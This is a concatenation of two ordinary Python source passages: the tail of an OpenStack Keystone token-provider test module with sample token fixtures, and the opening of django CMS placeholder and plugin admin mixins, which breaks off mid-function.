"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:9292"
},
{
"id": "4fa9620e42394cb1974736dce0856c71",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:9292"
},
{
"id": "9673687f9bc441d88dec37942bfd603b",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:9292"
}
],
"id": "d27a41843f4e4b0e8cf6dac4082deb0d",
"type": "image",
},
{
"endpoints": [
{
"id": "7bd0c643e05a4a2ab40902b2fa0dd4e6",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8080/v1"
},
{
"id": "43bef154594d4ccb8e49014d20624e1d",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8080/v1/AUTH_01257"
},
{
"id": "e63b5f5d7aa3493690189d0ff843b9b3",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8080/v1/AUTH_01257"
}
],
"id": "a669e152f1104810a4b6701aade721bb",
"type": "object-store",
},
{
"endpoints": [
{
"id": "51934fe63a5b4ac0a32664f64eb462c3",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
},
{
"id": "869b535eea0d42e483ae9da0d868ebad",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
},
{
"id": "93583824c18f4263a2245ca432b132a6",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
}
],
"id": "7f32cc2af6c9476e82d75f80e8b3bbb8",
"type": "compute",
},
{
"endpoints": [
{
"id": "b06997fd08414903ad458836efaa9067",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8773/services/Admin"
},
{
"id": "411f7de7c9a8484c9b46c254fb2676e2",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8773/services/Cloud"
},
{
"id": "f21c93f3da014785854b4126d0109c49",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8773/services/Cloud"
}
],
"id": "b08c9c7d4ef543eba5eeb766f72e5aa1",
"type": "ec2",
},
{
"endpoints": [
{
"id": "077d82df25304abeac2294004441db5a",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
},
{
"id": "875bf282362c40219665278b4fd11467",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
},
{
"id": "cd229aa6df0640dc858a8026eb7e640c",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
}
],
"id": "5db21b82617f4a95816064736a7bec22",
"type": "volume",
}
],
"expires_at": "2013-05-22T00:02:43.941430Z",
"issued_at": "2013-05-21T00:02:43.941473Z",
"methods": [
"password"
],
"project": {
"domain": {
"id": "default",
"name": "Default"
},
"id": "01257",
"name": "service"
},
"roles": [
{
"id": "9fe2ff9ee4384b1894a90878d3e92bab",
"name": "_member_"
},
{
"id": "53bff13443bd4450b97f978881d47b18",
"name": "admin"
}
],
"user": {
"domain": {
"id": "default",
"name": "Default"
},
"id": "f19ddbe2c53c46f189fe66d0a7a9c9ce",
"name": "nova"
},
"OS-TRUST:trust": {
"id": "abc123",
"trustee_user_id": "123456",
"trustor_user_id": "333333",
"impersonation": False
}
}
}
SAMPLE_V2_TOKEN_WITH_EMBEDED_VERSION = {
"access": {
"trust": {
"id": "abc123",
"trustee_user_id": "123456"
},
"serviceCatalog": [
{
"endpoints": [
{
"adminURL": "http://localhost:8774/v1.1/01257",
"id": "51934fe63a5b4ac0a32664f64eb462c3",
"internalURL": "http://localhost:8774/v1.1/01257",
"publicURL": "http://localhost:8774/v1.1/01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "nova",
"type": "compute"
},
{
"endpoints": [
{
"adminURL": "http://localhost:9292",
"id": "aaa17a539e364297a7845d67c7c7cc4b",
"internalURL": "http://localhost:9292",
"publicURL": "http://localhost:9292",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "glance",
"type": "image"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8776/v1/01257",
"id": "077d82df25304abeac2294004441db5a",
"internalURL": "http://localhost:8776/v1/01257",
"publicURL": "http://localhost:8776/v1/01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "volume",
"type": "volume"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8773/services/Admin",
"id": "b06997fd08414903ad458836efaa9067",
"internalURL": "http://localhost:8773/services/Cloud",
"publicURL": "http://localhost:8773/services/Cloud",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "ec2",
"type": "ec2"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8080/v1",
"id": "7bd0c643e05a4a2ab40902b2fa0dd4e6",
"internalURL": "http://localhost:8080/v1/AUTH_01257",
"publicURL": "http://localhost:8080/v1/AUTH_01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "swift",
"type": "object-store"
},
{
"endpoints": [
{
"adminURL": "http://localhost:35357/v2.0",
"id": "02850c5d1d094887bdc46e81e1e15dc7",
"internalURL": "http://localhost:5000/v2.0",
"publicURL": "http://localhost:5000/v2.0",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "keystone",
"type": "identity"
}
],
"token": {
"expires": "2013-05-22T00:02:43.941430Z",
"id": "ce4fc2d36eea4cc9a36e666ac2f1029a",
"issued_at": "2013-05-21T00:02:43.941473Z",
"tenant": {
"enabled": True,
"id": "01257",
"name": "service"
}
},
"user": {
"id": "f19ddbe2c53c46f189fe66d0a7a9c9ce",
"name": "nova",
"roles": [
{
"name": "_member_"
},
{
"name": "admin"
}
],
"roles_links": [],
"username": "nova"
}
},
'token_version': 'v2.0'
}
SAMPLE_V3_TOKEN_WITH_EMBEDED_VERSION = {
"token": {
"catalog": [
{
"endpoints": [
{
"id": "02850c5d1d094887bdc46e81e1e15dc7",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:35357/v2.0"
},
{
"id": "446e244b75034a9ab4b0811e82d0b7c8",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:5000/v2.0"
},
{
"id": "47fa3d9f499240abb5dfcf2668f168cd",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:5000/v2.0"
}
],
"id": "26d7541715a44a4d9adad96f9872b633",
"type": "identity",
},
{
"endpoints": [
{
"id": "aaa17a539e364297a7845d67c7c7cc4b",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:9292"
},
{
"id": "4fa9620e42394cb1974736dce0856c71",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:9292"
},
{
"id": "9673687f9bc441d88dec37942bfd603b",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:9292"
}
],
"id": "d27a41843f4e4b0e8cf6dac4082deb0d",
"type": "image",
},
{
"endpoints": [
{
"id": "7bd0c643e05a4a2ab40902b2fa0dd4e6",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8080/v1"
},
{
"id": "43bef154594d4ccb8e49014d20624e1d",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8080/v1/AUTH_01257"
},
{
"id": "e63b5f5d7aa3493690189d0ff843b9b3",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8080/v1/AUTH_01257"
}
],
"id": "a669e152f1104810a4b6701aade721bb",
"type": "object-store",
},
{
"endpoints": [
{
"id": "51934fe63a5b4ac0a32664f64eb462c3",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
},
{
"id": "869b535eea0d42e483ae9da0d868ebad",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
},
{
"id": "93583824c18f4263a2245ca432b132a6",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
}
],
"id": "7f32cc2af6c9476e82d75f80e8b3bbb8",
"type": "compute",
},
{
"endpoints": [
{
"id": "b06997fd08414903ad458836efaa9067",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8773/services/Admin"
},
{
"id": "411f7de7c9a8484c9b46c254fb2676e2",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8773/services/Cloud"
},
{
"id": "f21c93f3da014785854b4126d0109c49",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8773/services/Cloud"
}
],
"id": "b08c9c7d4ef543eba5eeb766f72e5aa1",
"type": "ec2",
},
{
"endpoints": [
{
"id": "077d82df25304abeac2294004441db5a",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
},
{
"id": "875bf282362c40219665278b4fd11467",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
},
{
"id": "cd229aa6df0640dc858a8026eb7e640c",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
}
],
"id": "5db21b82617f4a95816064736a7bec22",
"type": "volume",
}
],
"expires_at": "2013-05-22T00:02:43.941430Z",
"issued_at": "2013-05-21T00:02:43.941473Z",
"methods": [
"password"
],
"project": {
"domain": {
"id": "default",
"name": "Default"
},
"id": "01257",
"name": "service"
},
"roles": [
{
"id": "9fe2ff9ee4384b1894a90878d3e92bab",
"name": "_member_"
},
{
"id": "53bff13443bd4450b97f978881d47b18",
"name": "admin"
}
],
"user": {
"domain": {
"id": "default",
"name": "Default"
},
"id": "f19ddbe2c53c46f189fe66d0a7a9c9ce",
"name": "nova"
},
"OS-TRUST:trust": {
"id": "abc123",
"trustee_user_id": "123456",
"trustor_user_id": "333333",
"impersonation": False
}
},
'token_version': 'v3.0'
}
def create_v2_token():
return {
"access": {
"token": {
"expires": timeutils.isotime(CURRENT_DATE + FUTURE_DELTA),
"issued_at": "2013-05-21T00:02:43.941473Z",
"tenant": {
"enabled": True,
"id": "01257",
"name": "service"
}
}
}
}
SAMPLE_V2_TOKEN_EXPIRED = {
"access": {
"token": {
"expires": timeutils.isotime(CURRENT_DATE),
"issued_at": "2013-05-21T00:02:43.941473Z",
"tenant": {
"enabled": True,
"id": "01257",
"name": "service"
}
}
}
}
def create_v3_token():
return {
"token": {
'methods': [],
"expires_at": timeutils.isotime(CURRENT_DATE + FUTURE_DELTA),
"issued_at": "2013-05-21T00:02:43.941473Z",
}
}
SAMPLE_V3_TOKEN_EXPIRED = {
"token": {
"expires_at": timeutils.isotime(CURRENT_DATE),
"issued_at": "2013-05-21T00:02:43.941473Z",
}
}
SAMPLE_MALFORMED_TOKEN = {
"token": {
"bogus": {
"no expiration data": None
}
}
}
class TestTokenProvider(tests.TestCase):
def setUp(self):
super(TestTokenProvider, self).setUp()
self.load_backends()
def test_get_token_version(self):
self.assertEqual(
token.provider.V2,
self.token_provider_api.get_token_version(SAMPLE_V2_TOKEN))
self.assertEqual(
token.provider.V2,
self.token_provider_api.get_token_version(
SAMPLE_V2_TOKEN_WITH_EMBEDED_VERSION))
self.assertEqual(
token.provider.V3,
self.token_provider_api.get_token_version(SAMPLE_V3_TOKEN))
self.assertEqual(
token.provider.V3,
self.token_provider_api.get_token_version(
SAMPLE_V3_TOKEN_WITH_EMBEDED_VERSION))
self.assertRaises(token.provider.UnsupportedTokenVersionException,
self.token_provider_api.get_token_version,
'bogus')
def test_token_format_provider_mismatch(self):
self.config_fixture.config(group='signing', token_format='UUID')
self.config_fixture.config(group='token',
provider=token.provider.PKI_PROVIDER)
try:
token.provider.Manager()
raise Exception(
'expecting ValueError on token provider misconfiguration')
except exception.UnexpectedError:
pass
self.config_fixture.config(group='signing', token_format='PKI')
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
try:
token.provider.Manager()
raise Exception(
'expecting ValueError on token provider misconfiguration')
except exception.UnexpectedError:
pass
# should be OK as token_format and provider aligns
self.config_fixture.config(group='signing', token_format='PKI')
self.config_fixture.config(group='token',
provider=token.provider.PKI_PROVIDER)
token.provider.Manager()
self.config_fixture.config(group='signing', token_format='UUID')
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
token.provider.Manager()
def test_default_token_format(self):
self.assertEqual(token.provider.Manager.get_token_provider(),
token.provider.PKI_PROVIDER)
def test_uuid_token_format_and_no_provider(self):
self.config_fixture.config(group='signing', token_format='UUID')
self.assertEqual(token.provider.Manager.get_token_provider(),
token.provider.UUID_PROVIDER)
def test_default_providers_without_token_format(self):
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
token.provider.Manager()
self.config_fixture.config(group='token',
provider=token.provider.PKI_PROVIDER)
token.provider.Manager()
def test_unsupported_token_format(self):
self.config_fixture.config(group='signing', token_format='CUSTOM')
self.assertRaises(exception.UnexpectedError,
token.provider.Manager.get_token_provider)
def test_uuid_provider(self):
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
self.assertEqual(token.provider.Manager.get_token_provider(),
token.provider.UUID_PROVIDER)
def test_provider_override_token_format(self):
self.config_fixture.config(
group='token',
provider='keystone.token.providers.pki.Test')
self.assertEqual(token.provider.Manager.get_token_provider(),
'keystone.token.providers.pki.Test')
self.config_fixture.config(group='signing', token_format='UUID')
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
self.assertEqual(token.provider.Manager.get_token_provider(),
token.provider.UUID_PROVIDER)
self.config_fixture.config(group='signing', token_format='PKI')
self.config_fixture.config(group='token',
provider=token.provider.PKI_PROVIDER)
self.assertEqual(token.provider.Manager.get_token_provider(),
token.provider.PKI_PROVIDER)
self.config_fixture.config(group='signing', token_format='CUSTOM')
self.config_fixture.config(group='token',
provider='my.package.MyProvider')
self.assertEqual(token.provider.Manager.get_token_provider(),
'my.package.MyProvider')
def test_provider_token_expiration_validation(self):
self.assertRaises(exception.TokenNotFound,
self.token_provider_api._is_valid_token,
SAMPLE_V2_TOKEN_EXPIRED)
self.assertRaises(exception.TokenNotFound,
self.token_provider_api._is_valid_token,
SAMPLE_V3_TOKEN_EXPIRED)
self.assertRaises(exception.TokenNotFound,
self.token_provider_api._is_valid_token,
SAMPLE_MALFORMED_TOKEN)
self.assertEqual(
None,
self.token_provider_api._is_valid_token(create_v2_token()))
self.assertEqual(
None,
self.token_provider_api._is_valid_token(create_v3_token()))
def test_uuid_provider_no_oauth_fails_oauth(self):
self.load_fixtures(default_fixtures)
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
driver = token.provider.Manager().driver
driver.oauth_api = None
self.assertRaises(exception.Forbidden,
driver.issue_v3_token,
self.user_foo['id'], ['oauth1'])
class TestPKIProvider(object):
def setUp(self):
super(TestPKIProvider, self).setUp()
from keystoneclient.common import cms
self.cms = cms
from keystone.common import environment
self.environment = environment
old_cms_subprocess = cms.subprocess
self.addCleanup(setattr, cms, 'subprocess', old_cms_subprocess)
old_env_subprocess = environment.subprocess
self.addCleanup(setattr, environment, 'subprocess', old_env_subprocess)
self.cms.subprocess = self.target_subprocess
self.environment.subprocess = self.target_subprocess
reload(pki) # force module reload so the imports get re-evaluated
def test_get_token_id_error_handling(self):
# cause command-line failure
self.config_fixture.config(group='signing',
keyfile='--please-break-me')
provider = pki.Provider()
token_data = {}
self.assertRaises(exception.UnexpectedError,
provider._get_token_id,
token_data)
class TestPKIProviderWithEventlet(TestPKIProvider, tests.TestCase):
def setUp(self):
# force keystoneclient.common.cms to use eventlet's subprocess
from eventlet.green import subprocess
self.target_subprocess = subprocess
super(TestPKIProviderWithEventlet, self).setUp()
class TestPKIProviderWithStdlib(TestPKIProvider, tests.TestCase):
def setUp(self):
# force keystoneclient.common.cms to use the stdlib subprocess
import subprocess
self.target_subprocess = subprocess
super(TestPKIProviderWithStdlib, self).setUp()
|
|
# -*- coding: utf-8 -*-
from cms.models.placeholderpluginmodel import PlaceholderReference
from cms.utils.urlutils import admin_reverse
from django.contrib.admin.helpers import AdminForm
from django.utils.decorators import method_decorator
import json
from django.views.decorators.clickjacking import xframe_options_sameorigin
from cms.constants import PLUGIN_COPY_ACTION, PLUGIN_MOVE_ACTION
from cms.exceptions import PluginLimitReached
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.plugin_pool import plugin_pool
from cms.utils import get_cms_setting
from cms.utils.compat.dj import force_unicode
from cms.utils.plugins import requires_reload, has_reached_plugin_limit
from django.contrib.admin import ModelAdmin
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.template.defaultfilters import force_escape, escapejs
from django.utils.translation import ugettext as _
from django.conf import settings
from django.views.decorators.http import require_POST
import warnings
from django.template.response import TemplateResponse
from django.contrib.admin.util import get_deleted_objects
from django.core.exceptions import PermissionDenied
from django.db import router
from django.http import HttpResponseRedirect
from cms.utils import copy_plugins, permissions, get_language_from_request
from cms.utils.i18n import get_language_list
from cms.utils.transaction import wrap_transaction
class FrontendEditableAdminMixin(object):
frontend_editable_fields = []
def get_urls(self):
"""
Register the url for the single field edit view
"""
from django.conf.urls import patterns, url
info = "%s_%s" % (self.model._meta.app_label, self.model._meta.module_name)
pat = lambda regex, fn: url(regex, self.admin_site.admin_view(fn), name='%s_%s' % (info, fn.__name__))
url_patterns = patterns(
'',
pat(r'edit-field/([0-9]+)/([a-z\-]+)/$', self.edit_field),
)
return url_patterns + super(FrontendEditableAdminMixin, self).get_urls()
def _get_object_for_single_field(self, object_id, language):
# Quick and dirty way to retrieve objects for django-hvad
# Cleaner implementation will extend this method in a child mixin
try:
return self.model.objects.language(language).get(pk=object_id)
except AttributeError:
return self.model.objects.get(pk=object_id)
def edit_field(self, request, object_id, language):
obj = self._get_object_for_single_field(object_id, language)
opts = obj.__class__._meta
saved_successfully = False
cancel_clicked = request.POST.get("_cancel", False)
raw_fields = request.GET.get("edit_fields")
fields = [field for field in raw_fields.split(",") if field in self.frontend_editable_fields]
if not fields:
context = {
'opts': opts,
'message': force_unicode(_("Field %s not found")) % raw_fields
}
return render_to_response('admin/cms/page/plugin/error_form.html', context, RequestContext(request))
if not request.user.has_perm("%s_change" % self.model._meta.module_name):
context = {
'opts': opts,
'message': force_unicode(_("You do not have permission to edit this item"))
}
return render_to_response('admin/cms/page/plugin/error_form.html', context, RequestContext(request))
# Dinamically creates the form class with only `field_name` field
# enabled
form_class = self.get_form(request, obj, fields=fields)
if not cancel_clicked and request.method == 'POST':
form = form_class(instance=obj, data=request.POST)
if form.is_valid():
form.save()
saved_successfully = True
else:
form = form_class(instance=obj)
admin_form = AdminForm(form, fieldsets=[(None, {'fields': fields})], prepopulated_fields={},
model_admin=self)
media = self.media + admin_form.media
context = {
'CMS_MEDIA_URL': get_cms_setting('MEDIA_URL'),
'title': opts.verbose_name,
'plugin': None,
'plugin_id': None,
'adminform': admin_form,
'add': False,
'is_popup': True,
'media': media,
'opts': opts,
'change': True,
'save_as': False,
'has_add_permission': False,
'window_close_timeout': 10,
}
if cancel_clicked:
# cancel button was clicked
context.update({
'cancel': True,
})
return render_to_response('admin/cms/page/plugin/confirm_form.html', context, RequestContext(request))
if not cancel_clicked and request.method == 'POST' and saved_successfully:
return render_to_response('admin/cms/page/plugin/confirm_form.html', context, RequestContext(request))
return render_to_response('admin/cms/page/plugin/change_form.html', context, RequestContext(request))
class PlaceholderAdminMixin(object):
def get_urls(self):
"""
Register the plugin specific urls (add/edit/copy/remove/move)
"""
from django.conf.urls import patterns, url
info = "%s_%s" % (self.model._meta.app_label, self.model._meta.module_name)
pat = lambda regex, fn: url(regex, self.admin_site.admin_view(fn), name='%s_%s' % (info, fn.__name__))
url_patterns = patterns(
'',
pat(r'copy-plugins/$', self.copy_plugins),
pat(r'add-plugin/$', self.add_plugin),
pat(r'edit-plugin/([0-9]+)/$', self.edit_plugin),
pat(r'delete-plugin/([0-9]+)/$', self.delete_plugin),
pat(r'clear-placeholder/([0-9]+)/$', self.clear_placeholder),
pat(r'move-plugin/$', self.move_plugin),
)
return url_patterns + super(PlaceholderAdminMixin, self).get_urls()
def has_add_plugin_permission(self, request, placeholder, plugin_type):
if not permissions.has_plugin_permission(request.user, plugin_type, "add"):
return False
if not placeholder.has_add_permission(request):
return False
return True
def has_copy_plugin_permission(self, request, source_placeholder, target_placeholder, plugins):
if not source_placeholder.has_add_permission(request) or not target_placeholder.has_add_permission(
request):
return False
for plugin in plugins:
if not permissions.has_plugin_permission(request.user, plugin.plugin_type, "add"):
return False
return True
def has_change_plugin_permission(self, request, plugin):
if not permissions.has_plugin_permission(request.user, plugin.plugin_type, "change"):
return False
if not plugin.placeholder.has_change_permission(request):
return False
return True
def has_move_plugin_permission(self, request, plugin, target_placeholder):
if not permissions.has_plugin_permission(request.user, plugin.plugin_type, "change"):
return False
if not target_placeholder.has_change_permission(request):
return False
return True
def has_delete_plugin_permission(self, request, plugin):
if not permissions.has_plugin_permission(request.user, plugin.plugin_type, "delete"):
return False
placeholder = plugin.placeholder
if not placeholder.has_delete_permission(request):
return False
return True
def has_clear_placeholder_permission(self, request, placeholder):
if not placeholder.has_delete_permission(request):
return False
return True
def post_add_plugin(self, request, placeholder, plugin):
pass
def post_copy_plugins(self, request, source_placeholder, target_placeholder, plugins):
pass
def post_edit_plugin(self, request, plugin):
pass
def post_move_plugin(self, request, source_placeholder, target_placeholder, plugin):
pass
def post_delete_plugin(self, request, plugin):
pass
def post_clear_placeholder(self, request, placeholder):
pass
def get_placeholder_template(self, request, placeholder):
pass
@method_decorator(require_POST)
@xframe_options_sameorigin
def add_plugin(self, request):
"""
POST request should have the following data:
- placeholder_id
- plugin_type
- plugin_language
- plugin_parent (optional)
"""
plugin_type = request.POST['plugin_type']
placeholder_id = request.POST.get('placeholder_id', None)
parent_id = request.POST.get('parent_id', None)
if parent_id:
warnings.warn("parent_id is deprecated and will be removed in 3.1, use plugin_parent instead",
DeprecationWarning)
if not parent_id:
parent_id = request.POST.get('plugin_parent', None)
placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
if not self.has_add_plugin_permission(request, placeholder, plugin_type):
return HttpResponseForbidden(force_unicode(_('You do not have permission to add a plugin')))
parent = None
language = request.POST.get('plugin_language') or get_language_from_request(request)
try:
has_reached_plugin_limit(placeholder, plugin_type, language,
template=self.get_placeholder_template(request, placeholder))
except PluginLimitReached as er:
return HttpResponseBadRequest(er)
# page add-plugin
if not parent_id:
position = request.POST.get('plugin_order',
CMSPlugin.objects.filter(language=language, placeholder=placeholder).count())
# in-plugin add-plugin
else:
parent = get_object_or_404(CMSPlugin, pk=parent_id)
placeholder = parent.placeholder
position = request.POST.get('plugin_order',
CMSPlugin.objects.filter(language=language, parent=parent).count())
# placeholder (non-page) add-plugin
# Sanity check to make sure we're not getting bogus values from JavaScript:
if settings.USE_I18N:
if not language or not language in [lang[0] for lang in settings.LANGUAGES]:
return HttpResponseBadRequest(force_unicode(_("Language must be set to a supported language!")))
if parent and parent.language != language:
return HttpResponseBadRequest(force_unicode(_("Parent plugin language must be same as language!")))
else:
language = settings.LANGUAGE_CODE
plugin = CMSPlugin(language=language, plugin_type=plugin_type, position=position, placeholder=placeholder)
if parent:
plugin.position = CMSPlugin.objects.filter(parent=parent).count()
plugin.insert_at(parent, position='last-child', save=False)
plugin.save()
self.post_add_plugin(request, placeholder, plugin)
response = {
'url': force_unicode(
admin_reverse("%s_%s_edit_plugin" % (self.model._meta.app_label, self.model._meta.module_name),
args=[plugin.pk])),
'delete': force_unicode(
admin_reverse("%s_%s_delete_plugin" % (self.model._meta.app_label, self.model._meta.module_name),
args=[plugin.pk])),
'breadcrumb': plugin.get_breadcrumb(),
}
return HttpResponse(json.dumps(response), content_type='application/json')
@method_decorator(require_POST)
@xframe_options_sameorigin
@wrap_transaction
def copy_plugins(self, request):
"""
POST request should have the following data:
- source_language
- source_placeholder_id
- source_plugin_id (optional)
- target_language
- target_placeholder_id
- target_plugin_id (optional, new parent)
"""
source_language = request.POST['source_language']
source_placeholder_id = request.POST['source_placeholder_id']
source_plugin_id = request.POST.get('source_plugin_id', None)
target_language = request.POST['target_language']
target_placeholder_id = request.POST['target_placeholder_id']
target_plugin_id = request.POST.get('target_plugin_id', None)
source_placeholder = get_object_or_404(Placeholder, pk=source_placeholder_id)
target_placeholder = get_object_or_404(Placeholder, pk=target_placeholder_id)
if not target_language or not target_language in get_language_list():
return HttpResponseBadRequest(force_unicode(_("Language must be set to a supported language!")))
if source_plugin_id:
source_plugin = get_object_or_404(CMSPlugin, pk=source_plugin_id)
reload_required = requires_reload(PLUGIN_COPY_ACTION, [source_plugin])
if source_plugin.plugin_type == "PlaceholderPlugin":
# if it is a PlaceholderReference plugin only copy the plugins it references
inst, cls = source_plugin.get_plugin_instance(self)
plugins = inst.placeholder_ref.get_plugins_list()
else:
plugins = list(
source_placeholder.cmsplugin_set.filter(tree_id=source_plugin.tree_id, lft__gte=source_plugin.lft,
rght__lte=source_plugin.rght).order_by('tree_id', 'level',
'position'))
else:
plugins = list(
source_placeholder.cmsplugin_set.filter(language=source_language).order_by('tree_id', 'level',
'position'))
reload_required = requires_reload(PLUGIN_COPY_ACTION, plugins)
if not self.has_copy_plugin_permission(request, source_placeholder, target_placeholder, plugins):
return HttpResponseForbidden(force_unicode(_('You do not have permission to copy these plugins.')))
if target_placeholder.pk == request.toolbar.clipboard.pk and not source_plugin_id and not target_plugin_id:
# if we copy a whole placeholder to the clipboard create PlaceholderReference plugin instead and fill it
# the content of the source_placeholder.
ref = PlaceholderReference()
ref.name = source_placeholder.get_label()
ref.plugin_type = "PlaceholderPlugin"
ref.language = target_language
ref.placeholder = target_placeholder
ref.save()
ref.copy_from(source_placeholder, source_language)
else:
copy_plugins.copy_plugins_to(plugins, target_placeholder, target_language, target_plugin_id)
plugin_list = CMSPlugin.objects.filter(language=target_language, placeholder=target_placeholder).order_by(
'tree_id', 'level', 'position')
reduced_list = []
for plugin in plugin_list:
reduced_list.append(
{
'id': plugin.pk, 'type': plugin.plugin_type, 'parent': plugin.parent_id,
'position': plugin.position, 'desc': force_unicode(plugin.get_short_description()),
'language': plugin.language, 'placeholder_id': plugin.placeholder_id
}
)
self.post_copy_plugins(request, source_placeholder, target_placeholder, plugins)
json_response = {'plugin_list': reduced_list, 'reload': reload_required}
return HttpResponse(json.dumps(json_response), content_type='application/json')
@xframe_options_sameorigin
def edit_plugin(self, request, plugin_id):
plugin_id = int(plugin_id)
cms_plugin = get_object_or_404(CMSPlugin.objects.select_related('placeholder'), pk=plugin_id)
instance, plugin_admin = cms_plugin.get_plugin_instance(self.admin_site)
if not self.has_change_plugin_permission(request, cms_plugin):
return HttpResponseForbidden(force_unicode(_("You do not have permission to edit this plugin")))
plugin_admin.cms_plugin_instance = cms_plugin
try:
plugin_admin.placeholder = cms_plugin.placeholder
except Placeholder.DoesNotExist:
pass
if request.method == "POST":
# set the continue flag, otherwise will plugin_admin make redirect to list
# view, which actually doesn't exists
request.POST['_continue'] = True
if request.POST.get("_cancel", False):
# cancel button was clicked
context = {
'CMS_MEDIA_URL': get_cms_setting('MEDIA_URL'),
'plugin': cms_plugin,
'is_popup': True,
"type": cms_plugin.get_plugin_name(),
'plugin_id': plugin_id,
'icon': force_escape(escapejs(cms_plugin.get_instance_icon_src())),
'alt': force_escape(escapejs(cms_plugin.get_instance_icon_alt())),
'cancel': True,
}
instance = cms_plugin.get_plugin_instance()[0]
if instance:
context['name'] = force_unicode(instance)
else:
# cancelled before any content was added to plugin
cms_plugin.delete()
context.update({
"deleted": True,
'name': force_unicode(cms_plugin),
})
return render_to_response('admin/cms/page/plugin/confirm_form.html', context, RequestContext(request))
if not instance:
# instance doesn't exist, call add view
response = plugin_admin.add_view(request)
else:
# already saved before, call change view
# we actually have the instance here, but since i won't override
# change_view method, is better if it will be loaded again, so
# just pass id to plugin_admin
response = plugin_admin.change_view(request, str(plugin_id))
if request.method == "POST" and plugin_admin.object_successfully_changed:
self.post_edit_plugin(request, plugin_admin.saved_object)
saved_object = plugin_admin.saved_object
context = {
'CMS_MEDIA_URL': get_cms_setting('MEDIA_URL'),
'plugin': saved_object,
'is_popup': True,
'name': force_unicode(saved_object),
"type": saved_object.get_plugin_name(),
'plugin_id': plugin_id,
'icon': force_escape(saved_object.get_instance_icon_src()),
'alt': force_escape(saved_object.get_instance_icon_alt()),
}
return render_to_response('admin/cms/page/plugin/confirm_form.html', context, RequestContext(request))
return response
@method_decorator(require_POST)
@xframe_options_sameorigin
def move_plugin(self, request):
"""
POST request with following parameters:
-plugin_id
-placeholder_id
-plugin_language (optional)
-plugin_parent (optional)
-plugin_order (array, optional)
"""
plugin = CMSPlugin.objects.get(pk=int(request.POST['plugin_id']))
placeholder = Placeholder.objects.get(pk=request.POST['placeholder_id'])
parent_id = request.POST.get('plugin_parent', None)
language = request.POST.get('plugin_language', None)
source_placeholder = plugin.placeholder
if not parent_id:
parent_id = None
else:
parent_id = int(parent_id)
if not language and plugin.language:
language = plugin.language
order = request.POST.getlist("plugin_order[]")
if not self.has_move_plugin_permission(request, plugin, placeholder):
return HttpResponseForbidden(force_unicode(_("You have no permission to move this plugin")))
if plugin.parent_id != parent_id:
if parent_id:
parent = CMSPlugin.objects.get(pk=parent_id)
if parent.placeholder_id != placeholder.pk:
return HttpResponseBadRequest(force_unicode('parent must be in the same placeholder'))
if parent.language != language:
return HttpResponseBadRequest(force_unicode('parent must be in the same language as plugin_language'))
else:
parent = None
plugin.move_to(parent, position='last-child')
if not placeholder == source_placeholder:
try:
template = self.get_placeholder_template(request, placeholder)
has_reached_plugin_limit(placeholder, plugin.plugin_type, plugin.language, template=template)
except PluginLimitReached as er:
return HttpResponseBadRequest(er)
plugin.save()
for child in plugin.get_descendants(include_self=True):
child.placeholder = placeholder
child.language = language
child.save()
plugins = CMSPlugin.objects.filter(parent=parent_id, placeholder=placeholder, language=language).order_by('position')
x = 0
for level_plugin in plugins:
if order:
x = 0
found = False
for pk in order:
if level_plugin.pk == int(pk):
level_plugin.position = x
level_plugin.save()
found = True
break
x += 1
if not found:
